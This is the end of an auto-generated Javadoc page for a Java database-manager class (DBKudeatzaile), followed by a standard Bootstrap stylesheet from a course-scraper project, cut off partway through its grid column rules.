METHOD DETAIL ========== --> <ul class="blockList"> <li class="blockList"><a name="method.detail"> <!-- --> </a> <h3>Method Detail</h3> <a name="conOpen--"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>conOpen</h4> <pre>public&nbsp;void&nbsp;conOpen()</pre> </li> </ul> <a name="getInstantzia--"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getInstantzia</h4> <pre>public static&nbsp;<a href="../db/DBKudeatzaile.html" title="class in db">DBKudeatzaile</a>&nbsp;getInstantzia()</pre> </li> </ul> <a name="execSQL-java.lang.String-"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>execSQL</h4> <pre>public&nbsp;java.sql.ResultSet&nbsp;execSQL(java.lang.String&nbsp;query)</pre> </li> </ul> </li> </ul> </li> </ul> </div> </div> <!-- ========= END OF CLASS DATA ========= --> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar.bottom"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.bottom.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="class-use/DBKudeatzaile.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../deprecated-list.html">Deprecated</a></li> <li><a href="../index-files/index-1.html">Index</a></li> <li><a href="../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev&nbsp;Class</li> <li><a href="../db/Eragiketak.html" title="class in db"><span class="typeNameLink">Next&nbsp;Class</span></a></li> </ul> <ul class="navList"> <li><a href="../index.html?db/DBKudeatzaile.html" target="_top">Frames</a></li> <li><a href="DBKudeatzaile.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method.summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method.detail">Method</a></li> </ul> </div> <a name="skip.navbar.bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
web/static/css/bootstrap.css
teastares/Tsinghua_Course_Spider
html { font-family: sans-serif; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; } body { margin: 0; } article, aside, details, figcaption, figure, footer, header, hgroup, main, menu, nav, section, summary { display: block; } audio, canvas, progress, video { display: inline-block; vertical-align: baseline; } audio:not([controls]) { display: none; height: 0; } [hidden], template { display: none; } a { background-color: transparent; } a:active, a:hover { outline: 0; } abbr[title] { border-bottom: 1px dotted; } b, strong { font-weight: bold; } dfn { font-style: italic; } h1 { margin: .67em 0; font-size: 2em; } mark { color: #000; background: #ff0; } small { font-size: 80%; } sub, sup { position: relative; font-size: 75%; line-height: 0; vertical-align: baseline; } sup { top: -.5em; } sub { bottom: -.25em; } img { border: 0; } svg:not(:root) { overflow: hidden; } figure { margin: 1em 40px; } hr { height: 0; -webkit-box-sizing: content-box; -moz-box-sizing: content-box; box-sizing: content-box; } pre { overflow: auto; } code, kbd, pre, samp { font-family: monospace, monospace; font-size: 1em; } button, input, optgroup, select, textarea { margin: 0; font: inherit; color: inherit; } button { overflow: visible; } button, select { text-transform: none; } button, html input[type="button"], input[type="reset"], input[type="submit"] { -webkit-appearance: button; cursor: pointer; } button[disabled], html input[disabled] { cursor: default; } button::-moz-focus-inner, input::-moz-focus-inner { padding: 0; border: 0; } input { line-height: normal; } input[type="checkbox"], input[type="radio"] { -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; padding: 0; } input[type="number"]::-webkit-inner-spin-button, input[type="number"]::-webkit-outer-spin-button { height: auto; } input[type="search"] { -webkit-box-sizing: content-box; -moz-box-sizing: content-box; box-sizing: content-box; -webkit-appearance: textfield; } input[type="search"]::-webkit-search-cancel-button, input[type="search"]::-webkit-search-decoration { -webkit-appearance: none; } fieldset { padding: .35em .625em .75em; margin: 0 2px; border: 1px solid #c0c0c0; } legend { padding: 0; border: 0; } textarea { overflow: auto; } optgroup { font-weight: bold; } table { border-spacing: 0; border-collapse: collapse; } td, th { padding: 0; } /*! Source: https://github.com/h5bp/html5-boilerplate/blob/master/src/css/main.css */ @media print { *, *:before, *:after { color: #000 !important; text-shadow: none !important; background: transparent !important; -webkit-box-shadow: none !important; box-shadow: none !important; } a, a:visited { text-decoration: underline; } a[href]:after { content: " (" attr(href) ")"; } abbr[title]:after { content: " (" attr(title) ")"; } a[href^="#"]:after, a[href^="javascript:"]:after { content: ""; } pre, blockquote { border: 1px solid #999; page-break-inside: avoid; } thead { display: table-header-group; } tr, img { page-break-inside: avoid; } img { max-width: 100% !important; } p, h2, h3 { orphans: 3; widows: 3; } h2, h3 { page-break-after: avoid; } select { background: #fff !important; } .navbar { display: none; } .btn > .caret, .dropup > .btn > .caret { border-top-color: #000 !important; } .label { border: 1px solid #000; } .table { border-collapse: collapse !important; } .table td, .table th { background-color: #fff !important; } .table-bordered th, .table-bordered td { border: 1px solid #ddd !important; } } @font-face { font-family: 'Glyphicons Halflings'; src: url('../fonts/glyphicons-halflings-regular.eot'); src: url('../fonts/glyphicons-halflings-regular.eot?#iefix') format('embedded-opentype'), url('../fonts/glyphicons-halflings-regular.woff2') format('woff2'), url('../fonts/glyphicons-halflings-regular.woff') format('woff'), url('../fonts/glyphicons-halflings-regular.ttf') format('truetype'), url('../fonts/glyphicons-halflings-regular.svg#glyphicons_halflingsregular') format('svg'); } .glyphicon { position: relative; top: 1px; display: inline-block; font-family: 'Glyphicons Halflings'; font-style: normal; font-weight: normal; line-height: 1; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .glyphicon-asterisk:before { content: "\2a"; } .glyphicon-plus:before { content: "\2b"; } .glyphicon-euro:before, .glyphicon-eur:before { content: "\20ac"; } .glyphicon-minus:before { content: "\2212"; } .glyphicon-cloud:before { content: "\2601"; } .glyphicon-envelope:before { content: "\2709"; } .glyphicon-pencil:before { content: "\270f"; } .glyphicon-glass:before { content: "\e001"; } .glyphicon-music:before { content: "\e002"; } .glyphicon-search:before { content: "\e003"; } .glyphicon-heart:before { content: "\e005"; } .glyphicon-star:before { content: "\e006"; } .glyphicon-star-empty:before { content: "\e007"; } .glyphicon-user:before { content: "\e008"; } .glyphicon-film:before { content: "\e009"; } .glyphicon-th-large:before { content: "\e010"; } .glyphicon-th:before { content: "\e011"; } .glyphicon-th-list:before { content: "\e012"; } .glyphicon-ok:before { content: "\e013"; } .glyphicon-remove:before { content: "\e014"; } .glyphicon-zoom-in:before { content: "\e015"; } .glyphicon-zoom-out:before { content: "\e016"; } .glyphicon-off:before { content: "\e017"; } .glyphicon-signal:before { content: "\e018"; } .glyphicon-cog:before { content: "\e019"; } .glyphicon-trash:before { content: "\e020"; } .glyphicon-home:before { content: "\e021"; } .glyphicon-file:before { content: "\e022"; } .glyphicon-time:before { content: "\e023"; } .glyphicon-road:before { content: "\e024"; } .glyphicon-download-alt:before { content: "\e025"; } .glyphicon-download:before { content: "\e026"; } .glyphicon-upload:before { content: "\e027"; } .glyphicon-inbox:before { content: "\e028"; } .glyphicon-play-circle:before { content: "\e029"; } .glyphicon-repeat:before { content: "\e030"; } .glyphicon-refresh:before { content: "\e031"; } .glyphicon-list-alt:before { content: "\e032"; } .glyphicon-lock:before { content: "\e033"; } .glyphicon-flag:before { content: "\e034"; } .glyphicon-headphones:before { content: "\e035"; } .glyphicon-volume-off:before { content: "\e036"; } .glyphicon-volume-down:before { content: "\e037"; } .glyphicon-volume-up:before { content: "\e038"; } .glyphicon-qrcode:before { content: "\e039"; } .glyphicon-barcode:before { content: "\e040"; } .glyphicon-tag:before { content: "\e041"; } .glyphicon-tags:before { content: "\e042"; } .glyphicon-book:before { content: "\e043"; } .glyphicon-bookmark:before { content: "\e044"; } .glyphicon-print:before { content: "\e045"; } .glyphicon-camera:before { content: "\e046"; } .glyphicon-font:before { content: "\e047"; } .glyphicon-bold:before { content: "\e048"; } .glyphicon-italic:before { content: "\e049"; } .glyphicon-text-height:before { content: "\e050"; } .glyphicon-text-width:before { content: "\e051"; } .glyphicon-align-left:before { content: "\e052"; } .glyphicon-align-center:before { content: "\e053"; } .glyphicon-align-right:before { content: "\e054"; } .glyphicon-align-justify:before { content: "\e055"; } .glyphicon-list:before { content: "\e056"; } .glyphicon-indent-left:before { content: "\e057"; } .glyphicon-indent-right:before { content: "\e058"; } .glyphicon-facetime-video:before { content: "\e059"; } .glyphicon-picture:before { content: "\e060"; } .glyphicon-map-marker:before { content: "\e062"; } .glyphicon-adjust:before { content: "\e063"; } .glyphicon-tint:before { content: "\e064"; } .glyphicon-edit:before { content: "\e065"; } .glyphicon-share:before { content: "\e066"; } .glyphicon-check:before { content: "\e067"; } .glyphicon-move:before { content: "\e068"; } .glyphicon-step-backward:before { content: "\e069"; } .glyphicon-fast-backward:before { content: "\e070"; } .glyphicon-backward:before { content: "\e071"; } .glyphicon-play:before { content: "\e072"; } .glyphicon-pause:before { content: "\e073"; } .glyphicon-stop:before { content: "\e074"; } .glyphicon-forward:before { content: "\e075"; } .glyphicon-fast-forward:before { content: "\e076"; } .glyphicon-step-forward:before { content: "\e077"; } .glyphicon-eject:before { content: "\e078"; } .glyphicon-chevron-left:before { content: "\e079"; } .glyphicon-chevron-right:before { content: "\e080"; } .glyphicon-plus-sign:before { content: "\e081"; } .glyphicon-minus-sign:before { content: "\e082"; } .glyphicon-remove-sign:before { content: "\e083"; } .glyphicon-ok-sign:before { content: "\e084"; } .glyphicon-question-sign:before { content: "\e085"; } .glyphicon-info-sign:before { content: "\e086"; } .glyphicon-screenshot:before { content: "\e087"; } .glyphicon-remove-circle:before { content: "\e088"; } .glyphicon-ok-circle:before { content: "\e089"; } .glyphicon-ban-circle:before { content: "\e090"; } .glyphicon-arrow-left:before { content: "\e091"; } .glyphicon-arrow-right:before { content: "\e092"; } .glyphicon-arrow-up:before { content: "\e093"; } .glyphicon-arrow-down:before { content: "\e094"; } .glyphicon-share-alt:before { content: "\e095"; } .glyphicon-resize-full:before { content: "\e096"; } .glyphicon-resize-small:before { content: "\e097"; } .glyphicon-exclamation-sign:before { content: "\e101"; } .glyphicon-gift:before { content: "\e102"; } .glyphicon-leaf:before { content: "\e103"; } .glyphicon-fire:before { content: "\e104"; } .glyphicon-eye-open:before { content: "\e105"; } .glyphicon-eye-close:before { content: "\e106"; } .glyphicon-warning-sign:before { content: "\e107"; } .glyphicon-plane:before { content: "\e108"; } .glyphicon-calendar:before { content: "\e109"; } .glyphicon-random:before { content: "\e110"; } .glyphicon-comment:before { content: "\e111"; } .glyphicon-magnet:before { content: "\e112"; } .glyphicon-chevron-up:before { content: "\e113"; } .glyphicon-chevron-down:before { content: "\e114"; } .glyphicon-retweet:before { content: "\e115"; } .glyphicon-shopping-cart:before { content: "\e116"; } .glyphicon-folder-close:before { content: "\e117"; } .glyphicon-folder-open:before { content: "\e118"; } .glyphicon-resize-vertical:before { content: "\e119"; } .glyphicon-resize-horizontal:before { content: "\e120"; } .glyphicon-hdd:before { content: "\e121"; } .glyphicon-bullhorn:before { content: "\e122"; } .glyphicon-bell:before { content: "\e123"; } .glyphicon-certificate:before { content: "\e124"; } .glyphicon-thumbs-up:before { content: "\e125"; } .glyphicon-thumbs-down:before { content: "\e126"; } .glyphicon-hand-right:before { content: "\e127"; } .glyphicon-hand-left:before { content: "\e128"; } .glyphicon-hand-up:before { content: "\e129"; } .glyphicon-hand-down:before { content: "\e130"; } .glyphicon-circle-arrow-right:before { content: "\e131"; } .glyphicon-circle-arrow-left:before { content: "\e132"; } .glyphicon-circle-arrow-up:before { content: "\e133"; } .glyphicon-circle-arrow-down:before { content: "\e134"; } .glyphicon-globe:before { content: "\e135"; } .glyphicon-wrench:before { content: "\e136"; } .glyphicon-tasks:before { content: "\e137"; } .glyphicon-filter:before { content: "\e138"; } .glyphicon-briefcase:before { content: "\e139"; } .glyphicon-fullscreen:before { content: "\e140"; } .glyphicon-dashboard:before { content: "\e141"; } .glyphicon-paperclip:before { content: "\e142"; } .glyphicon-heart-empty:before { content: "\e143"; } .glyphicon-link:before { content: "\e144"; } .glyphicon-phone:before { content: "\e145"; } .glyphicon-pushpin:before { content: "\e146"; } .glyphicon-usd:before { content: "\e148"; } .glyphicon-gbp:before { content: "\e149"; } .glyphicon-sort:before { content: "\e150"; } .glyphicon-sort-by-alphabet:before { content: "\e151"; } .glyphicon-sort-by-alphabet-alt:before { content: "\e152"; } .glyphicon-sort-by-order:before { content: "\e153"; } .glyphicon-sort-by-order-alt:before { content: "\e154"; } .glyphicon-sort-by-attributes:before { content: "\e155"; } .glyphicon-sort-by-attributes-alt:before { content: "\e156"; } .glyphicon-unchecked:before { content: "\e157"; } .glyphicon-expand:before { content: "\e158"; } .glyphicon-collapse-down:before { content: "\e159"; } .glyphicon-collapse-up:before { content: "\e160"; } .glyphicon-log-in:before { content: "\e161"; } .glyphicon-flash:before { content: "\e162"; } .glyphicon-log-out:before { content: "\e163"; } .glyphicon-new-window:before { content: "\e164"; } .glyphicon-record:before { content: "\e165"; } .glyphicon-save:before { content: "\e166"; } .glyphicon-open:before { content: "\e167"; } .glyphicon-saved:before { content: "\e168"; } .glyphicon-import:before { content: "\e169"; } .glyphicon-export:before { content: "\e170"; } .glyphicon-send:before { content: "\e171"; } .glyphicon-floppy-disk:before { content: "\e172"; } .glyphicon-floppy-saved:before { content: "\e173"; } .glyphicon-floppy-remove:before { content: "\e174"; } .glyphicon-floppy-save:before { content: "\e175"; } .glyphicon-floppy-open:before { content: "\e176"; } .glyphicon-credit-card:before { content: "\e177"; } .glyphicon-transfer:before { content: "\e178"; } .glyphicon-cutlery:before { content: "\e179"; } .glyphicon-header:before { content: "\e180"; } .glyphicon-compressed:before { content: "\e181"; } .glyphicon-earphone:before { content: "\e182"; } .glyphicon-phone-alt:before { content: "\e183"; } .glyphicon-tower:before { content: "\e184"; } .glyphicon-stats:before { content: "\e185"; } .glyphicon-sd-video:before { content: "\e186"; } .glyphicon-hd-video:before { content: "\e187"; } .glyphicon-subtitles:before { content: "\e188"; } .glyphicon-sound-stereo:before { content: "\e189"; } .glyphicon-sound-dolby:before { content: "\e190"; } .glyphicon-sound-5-1:before { content: "\e191"; } .glyphicon-sound-6-1:before { content: "\e192"; } .glyphicon-sound-7-1:before { content: "\e193"; } .glyphicon-copyright-mark:before { content: "\e194"; } .glyphicon-registration-mark:before { content: "\e195"; } .glyphicon-cloud-download:before { content: "\e197"; } .glyphicon-cloud-upload:before { content: "\e198"; } .glyphicon-tree-conifer:before { content: "\e199"; } .glyphicon-tree-deciduous:before { content: "\e200"; } .glyphicon-cd:before { content: "\e201"; } .glyphicon-save-file:before { content: "\e202"; } .glyphicon-open-file:before { content: "\e203"; } .glyphicon-level-up:before { content: "\e204"; } .glyphicon-copy:before { content: "\e205"; } .glyphicon-paste:before { content: "\e206"; } .glyphicon-alert:before { content: "\e209"; } .glyphicon-equalizer:before { content: "\e210"; } .glyphicon-king:before { content: "\e211"; } .glyphicon-queen:before { content: "\e212"; } .glyphicon-pawn:before { content: "\e213"; } .glyphicon-bishop:before { content: "\e214"; } .glyphicon-knight:before { content: "\e215"; } .glyphicon-baby-formula:before { content: "\e216"; } .glyphicon-tent:before { content: "\26fa"; } .glyphicon-blackboard:before { content: "\e218"; } .glyphicon-bed:before { content: "\e219"; } .glyphicon-apple:before { content: "\f8ff"; } .glyphicon-erase:before { content: "\e221"; } .glyphicon-hourglass:before { content: "\231b"; } .glyphicon-lamp:before { content: "\e223"; } .glyphicon-duplicate:before { content: "\e224"; } .glyphicon-piggy-bank:before { content: "\e225"; } .glyphicon-scissors:before { content: "\e226"; } .glyphicon-bitcoin:before { content: "\e227"; } .glyphicon-btc:before { content: "\e227"; } .glyphicon-xbt:before { content: "\e227"; } .glyphicon-yen:before { content: "\00a5"; } .glyphicon-jpy:before { content: "\00a5"; } .glyphicon-ruble:before { content: "\20bd"; } .glyphicon-rub:before { content: "\20bd"; } .glyphicon-scale:before { content: "\e230"; } .glyphicon-ice-lolly:before { content: "\e231"; } .glyphicon-ice-lolly-tasted:before { content: "\e232"; } .glyphicon-education:before { content: "\e233"; } .glyphicon-option-horizontal:before { content: "\e234"; } .glyphicon-option-vertical:before { content: "\e235"; } .glyphicon-menu-hamburger:before { content: "\e236"; } .glyphicon-modal-window:before { content: "\e237"; } .glyphicon-oil:before { content: "\e238"; } .glyphicon-grain:before { content: "\e239"; } .glyphicon-sunglasses:before { content: "\e240"; } .glyphicon-text-size:before { content: "\e241"; } .glyphicon-text-color:before { content: "\e242"; } .glyphicon-text-background:before { content: "\e243"; } .glyphicon-object-align-top:before { content: "\e244"; } .glyphicon-object-align-bottom:before { content: "\e245"; } .glyphicon-object-align-horizontal:before { content: "\e246"; } .glyphicon-object-align-left:before { content: "\e247"; } .glyphicon-object-align-vertical:before { content: "\e248"; } .glyphicon-object-align-right:before { content: "\e249"; } .glyphicon-triangle-right:before { content: "\e250"; } .glyphicon-triangle-left:before { content: "\e251"; } .glyphicon-triangle-bottom:before { content: "\e252"; } .glyphicon-triangle-top:before { content: "\e253"; } .glyphicon-console:before { content: "\e254"; } .glyphicon-superscript:before { content: "\e255"; } .glyphicon-subscript:before { content: "\e256"; } .glyphicon-menu-left:before { content: "\e257"; } .glyphicon-menu-right:before { content: "\e258"; } .glyphicon-menu-down:before { content: "\e259"; } .glyphicon-menu-up:before { content: "\e260"; } * { -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; } *:before, *:after { -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; } html { font-size: 10px; -webkit-tap-highlight-color: rgba(0, 0, 0, 0); } body { font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 14px; line-height: 1.42857143; color: #333; background-color: #fff; } input, button, select, textarea { font-family: inherit; font-size: inherit; line-height: inherit; } a { color: #337ab7; text-decoration: none; } a:hover, a:focus { color: #23527c; text-decoration: underline; } a:focus { outline: thin dotted; outline: 5px auto -webkit-focus-ring-color; outline-offset: -2px; } figure { margin: 0; } img { vertical-align: middle; } .img-responsive, .thumbnail > img, .thumbnail a > img, .carousel-inner > .item > img, .carousel-inner > .item > a > img { display: block; max-width: 100%; height: auto; } .img-rounded { border-radius: 6px; } .img-thumbnail { display: inline-block; max-width: 100%; height: auto; padding: 4px; line-height: 1.42857143; background-color: #fff; border: 1px solid #ddd; border-radius: 4px; -webkit-transition: all .2s ease-in-out; -o-transition: all .2s ease-in-out; transition: all .2s ease-in-out; } .img-circle { border-radius: 50%; } hr { margin-top: 20px; margin-bottom: 20px; border: 0; border-top: 1px solid #eee; } .sr-only { position: absolute; width: 1px; height: 1px; padding: 0; margin: -1px; overflow: hidden; clip: rect(0, 0, 0, 0); border: 0; } .sr-only-focusable:active, .sr-only-focusable:focus { position: static; width: auto; height: auto; margin: 0; overflow: visible; clip: auto; } [role="button"] { cursor: pointer; } h1, h2, h3, h4, h5, h6, .h1, .h2, .h3, .h4, .h5, .h6 { font-family: inherit; font-weight: 500; line-height: 1.1; color: inherit; } h1 small, h2 small, h3 small, h4 small, h5 small, h6 small, .h1 small, .h2 small, .h3 small, .h4 small, .h5 small, .h6 small, h1 .small, h2 .small, h3 .small, h4 .small, h5 .small, h6 .small, .h1 .small, .h2 .small, .h3 .small, .h4 .small, .h5 .small, .h6 .small { font-weight: normal; line-height: 1; color: #777; } h1, .h1, h2, .h2, h3, .h3 { margin-top: 20px; margin-bottom: 10px; } h1 small, .h1 small, h2 small, .h2 small, h3 small, .h3 small, h1 .small, .h1 .small, h2 .small, .h2 .small, h3 .small, .h3 .small { font-size: 65%; } h4, .h4, h5, .h5, h6, .h6 { margin-top: 10px; margin-bottom: 10px; } h4 small, .h4 small, h5 small, .h5 small, h6 small, .h6 small, h4 .small, .h4 .small, h5 .small, .h5 .small, h6 .small, .h6 .small { font-size: 75%; } h1, .h1 { font-size: 36px; } h2, .h2 { font-size: 30px; } h3, .h3 { font-size: 24px; } h4, .h4 { font-size: 18px; } h5, .h5 { font-size: 14px; } h6, .h6 { font-size: 12px; } p { margin: 0 0 10px; } .lead { margin-bottom: 20px; font-size: 16px; font-weight: 300; line-height: 1.4; } @media (min-width: 768px) { .lead { font-size: 21px; } } small, .small { font-size: 85%; } mark, .mark { padding: .2em; background-color: #fcf8e3; } .text-left { text-align: left; } .text-right { text-align: right; } .text-center { text-align: center; } .text-justify { text-align: justify; } .text-nowrap { white-space: nowrap; } .text-lowercase { text-transform: lowercase; } .text-uppercase { text-transform: uppercase; } .text-capitalize { text-transform: capitalize; } .text-muted { color: #777; } .text-primary { color: #337ab7; } a.text-primary:hover { color: #286090; } .text-success { color: #3c763d; } a.text-success:hover { color: #2b542c; } .text-info { color: #31708f; } a.text-info:hover { color: #245269; } .text-warning { color: #8a6d3b; } a.text-warning:hover { color: #66512c; } .text-danger { color: #a94442; } a.text-danger:hover { color: #843534; } .bg-primary { color: #fff; background-color: #337ab7; } a.bg-primary:hover { background-color: #286090; } .bg-success { background-color: #dff0d8; } a.bg-success:hover { background-color: #c1e2b3; } .bg-info { background-color: #d9edf7; } a.bg-info:hover { background-color: #afd9ee; } .bg-warning { background-color: #fcf8e3; } a.bg-warning:hover { background-color: #f7ecb5; } .bg-danger { background-color: #f2dede; } a.bg-danger:hover { background-color: #e4b9b9; } .page-header { padding-bottom: 9px; margin: 40px 0 20px; border-bottom: 1px solid #eee; } ul, ol { margin-top: 0; margin-bottom: 10px; } ul ul, ol ul, ul ol, ol ol { margin-bottom: 0; } .list-unstyled { padding-left: 0; list-style: none; } .list-inline { padding-left: 0; margin-left: -5px; list-style: none; } .list-inline > li { display: inline-block; padding-right: 5px; padding-left: 5px; } dl { margin-top: 0; margin-bottom: 20px; } dt, dd { line-height: 1.42857143; } dt { font-weight: bold; } dd { margin-left: 0; } @media (min-width: 768px) { .dl-horizontal dt { float: left; width: 160px; overflow: hidden; clear: left; text-align: right; text-overflow: ellipsis; white-space: nowrap; } .dl-horizontal dd { margin-left: 180px; } } abbr[title], abbr[data-original-title] { cursor: help; border-bottom: 1px dotted #777; } .initialism { font-size: 90%; text-transform: uppercase; } blockquote { padding: 10px 20px; margin: 0 0 20px; font-size: 17.5px; border-left: 5px solid #eee; } blockquote p:last-child, blockquote ul:last-child, blockquote ol:last-child { margin-bottom: 0; } blockquote footer, blockquote small, blockquote .small { display: block; font-size: 80%; line-height: 1.42857143; color: #777; } blockquote footer:before, blockquote small:before, blockquote .small:before { content: '\2014 \00A0'; } .blockquote-reverse, blockquote.pull-right { padding-right: 15px; padding-left: 0; text-align: right; border-right: 5px solid #eee; border-left: 0; } .blockquote-reverse footer:before, blockquote.pull-right footer:before, .blockquote-reverse small:before, blockquote.pull-right small:before, .blockquote-reverse .small:before, blockquote.pull-right .small:before { content: ''; } .blockquote-reverse footer:after, blockquote.pull-right footer:after, .blockquote-reverse small:after, blockquote.pull-right small:after, .blockquote-reverse .small:after, blockquote.pull-right .small:after { content: '\00A0 \2014'; } address { margin-bottom: 20px; font-style: normal; line-height: 1.42857143; } code, kbd, pre, samp { font-family: Menlo, Monaco, Consolas, "Courier New", monospace; } code { padding: 2px 4px; font-size: 90%; color: #c7254e; background-color: #f9f2f4; border-radius: 4px; } kbd { padding: 2px 4px; font-size: 90%; color: #fff; background-color: #333; border-radius: 3px; -webkit-box-shadow: inset 0 -1px 0 rgba(0, 0, 0, .25); box-shadow: inset 0 -1px 0 rgba(0, 0, 0, .25); } kbd kbd { padding: 0; font-size: 100%; font-weight: bold; -webkit-box-shadow: none; box-shadow: none; } pre { display: block; padding: 9.5px; margin: 0 0 10px; font-size: 13px; line-height: 1.42857143; color: #333; word-break: break-all; word-wrap: break-word; background-color: #f5f5f5; border: 1px solid #ccc; border-radius: 4px; } pre code { padding: 0; font-size: inherit; color: inherit; white-space: pre-wrap; background-color: transparent; border-radius: 0; } .pre-scrollable { max-height: 340px; overflow-y: scroll; } .container { padding-right: 15px; padding-left: 15px; margin-right: auto; margin-left: auto; } @media (min-width: 768px) { .container { width: 750px; } } @media (min-width: 992px) { .container { width: 970px; } } @media (min-width: 1200px) { .container { width: 1170px; } } .container-fluid { padding-right: 15px; padding-left: 15px; margin-right: auto; margin-left: auto; } .row { margin-right: -15px; margin-left: -15px; } .col-xs-1, .col-sm-1, .col-md-1, .col-lg-1, .col-xs-2, .col-sm-2, .col-md-2, .col-lg-2, .col-xs-3, .col-sm-3, .col-md-3, .col-lg-3, .col-xs-4, .col-sm-4, .col-md-4, .col-lg-4, .col-xs-5, .col-sm-5, .col-md-5, .col-lg-5, .col-xs-6, .col-sm-6, .col-md-6, .col-lg-6, .col-xs-7, .col-sm-7, .col-md-7, .col-lg-7, .col-xs-8, .col-sm-8, .col-md-8, .col-lg-8, .col-xs-9, .col-sm-9, .col-md-9, .col-lg-9, .col-xs-10, .col-sm-10, .col-md-10, .col-lg-10, .col-xs-11, .col-sm-11, .col-md-11, .col-lg-11, .col-xs-12, .col-sm-12, .col-md-12, .col-lg-12 { position: relative; min-height: 1px; padding-right: 15px; padding-left: 15px; } .col-xs-1, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5, .col-xs-6, .col-xs-7, .col-xs-8, .col-xs-9, .col-xs-10, .col-xs-11, .col-xs-12 { float: left; } .col-xs-12 { width: 100%; } .col-xs-11 { width: 91.66666667%; } .col-xs-10 { width: 83.33333333%; } .col-xs-9 { width: 75%; } .col-xs-8 { width: 66.66666667%; } .col-xs-7 { width: 58.33333333%; } .col-xs-6 { width: 50%; } .col-xs-5 { width: 41.66666667%; } .col-xs-4 { width: 33.33333333%; } .col-xs-3 { width: 25%; } .col-xs-2 { width: 16.66666667%; } .col-xs-1 { width: 8.33333333%; } .col-xs-pull-12 { right: 100%; } .col-xs-pull-11 { right: 91.66666667%; } .col-xs-pull-10 { right: 83.33333333%; } .col-xs-pull-9 { right: 75%; } .col-xs-pull-8 { right: 66.66666667%; } .col-xs-pull-7 { right: 58.33333333%; } .col-xs-pull-6 { right: 50%; } .col-xs-pull-5 { right: 41.66666667%; } .col-xs-pull-4 { right: 33.33333333%; } .col-xs-pull-3 { right: 25%; } .col-xs-pull-2 { right: 16.66666667%; } .col-xs-pull-1 { right: 8.33333333%; } .col-xs-pull-0 { right: auto; } .col-xs-push-12 { left: 100%; } .col-xs-push-11 { left: 91.66666667%; } .col-xs-push-10 { left: 83.33333333%; } .col-xs-push-9 { left: 75%; } .col-xs-push-8 { left: 66.66666667%; } .col-xs-push-7 { left: 58.33333333%; } .col-xs-push-6 { left: 50%; } .col-xs-push-5 { left: 41.66666667%; } .col-xs-push-4 { left: 33.33333333%; } .col-xs-push-3 { left: 25%; } .col-xs-push-2 { left: 16.66666667%; } .col-xs-push-1 { left: 8.33333333%; } .col-xs-push-0 { left: auto; } .col-xs-offset-12 { margin-left: 100%; } .col-xs-offset-11 { margin-left: 91.66666667%; } .col-xs-offset-10 { margin-left: 83.33333333%; } .col-xs-offset-9 { margin-left: 75%; } .col-xs-offset-8 { margin-left: 66.66666667%; } .col-xs-offset-7 { margin-left: 58.33333333%; } .col-xs-offset-6 { margin-left: 50%; } .col-xs-offset-5 { margin-left: 41.66666667%; } .col-xs-offset-4 { margin-left: 33.33333333%; } .col-xs-offset-3 { margin-left: 25%; } .col-xs-offset-2 { margin-left: 16.66666667%; } .col-xs-offset-1 { margin-left: 8.33333333%; } .col-xs-offset-0 { margin-left: 0; } @media (min-width: 768px) { .col-sm-1, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-sm-10, .col-sm-11, .col-sm-12 { float: left; } .col-sm-12 { width: 100%; } .col-sm-11 { width: 91.66666667%; } .col-sm-10 { width: 83.33333333%; } .col-sm-9 { width: 75%; } .col-sm-8 { width: 66.66666667%; } .col-sm-7 { width: 58.33333333%; } .col-sm-6 { width: 50%; } .col-sm-5 { width: 41.66666667%; } .col-sm-4 { width: 33.33333333%; } .col-sm-3 { width: 25%; } .col-sm-2 { width: 16.66666667%; } .col-sm-1 { width: 8.33333333%; } .col-sm-pull-12 { right: 100%; } .col-sm-pull-11 { right: 91.66666667%; } .col-sm-pull-10 { right: 83.33333333%; } .col-sm-pull-9 { right: 75%; } .col-sm-pull-8 { right: 66.66666667%; } .col-sm-pull-7 { right: 58.33333333%; } .col-sm-pull-6 { right: 50%; } .col-sm-pull-5 { right: 41.66666667%; } .col-sm-pull-4 { right: 33.33333333%; } .col-sm-pull-3 { right: 25%; } .col-sm-pull-2 { right: 16.66666667%; } .col-sm-pull-1 { right: 8.33333333%; } .col-sm-pull-0 { right: auto; } .col-sm-push-12 { left: 100%; } .col-sm-push-11 { left: 91.66666667%; } .col-sm-push-10 { left: 83.33333333%; } .col-sm-push-9 { left: 75%; } .col-sm-push-8 { left: 66.66666667%; } .col-sm-push-7 { left: 58.33333333%; } .col-sm-push-6 { left: 50%; } .col-sm-push-5 { left: 41.66666667%; } .col-sm-push-4 { left: 33.33333333%; } .col-sm-push-3 { 